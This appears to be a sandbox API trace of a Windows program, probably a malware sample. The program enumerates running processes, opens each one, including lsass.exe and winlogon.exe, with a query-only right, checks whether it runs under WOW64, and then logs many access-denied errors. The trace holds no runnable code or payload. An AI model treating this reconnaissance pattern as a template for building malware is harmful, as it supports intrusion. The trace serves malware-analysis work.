	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772188, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dc50, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0074.491] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0074.492] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.492] CloseHandle (hObject=0x224) returned 1
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x7721b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.492] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0074.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0074.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0074.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.493] CloseHandle (hObject=0x224) returned 1
	[0074.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0074.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0074.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.493] CloseHandle (hObject=0x224) returned 1
	[0074.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0074.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.493] CloseHandle (hObject=0x224) returned 1
	[0074.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0074.493] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.493] CloseHandle (hObject=0x224) returned 1
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.494] CloseHandle (hObject=0x224) returned 1
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728958, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.494] CloseHandle (hObject=0x224) returned 1
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.494] CloseHandle (hObject=0x224) returned 1
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.494] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.494] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.494] CloseHandle (hObject=0x224) returned 1
	[0074.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.495] CloseHandle (hObject=0x224) returned 1
	[0074.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.495] CloseHandle (hObject=0x224) returned 1
	[0074.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7287f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772170, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.495] CloseHandle (hObject=0x224) returned 1
	[0074.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.495] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.495] CloseHandle (hObject=0x224) returned 1
	[0074.495] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dd60, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x7288b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72e888, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.496] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.496] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.496] CloseHandle (hObject=0x224) returned 1
	[0074.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x7288b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.497] CloseHandle (hObject=0x224) returned 1
	[0074.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.497] CloseHandle (hObject=0x224) returned 1
	[0074.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.497] CloseHandle (hObject=0x224) returned 1
	[0074.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.497] CloseHandle (hObject=0x224) returned 1
	[0074.497] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72e6d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.497] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.497] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.497] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x7721a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.498] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x7721a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.498] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x728a18, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.498] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.498] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.498] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.498] CloseHandle (hObject=0x224) returned 1
	[0074.498] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72ea68, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.499] CloseHandle (hObject=0x224) returned 1
	[0074.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72e798, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.499] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.499] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.499] CloseHandle (hObject=0x224) returned 1
	[0074.500] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x7721d0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.500] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
	[0074.501] GetLastError () returned 0x5
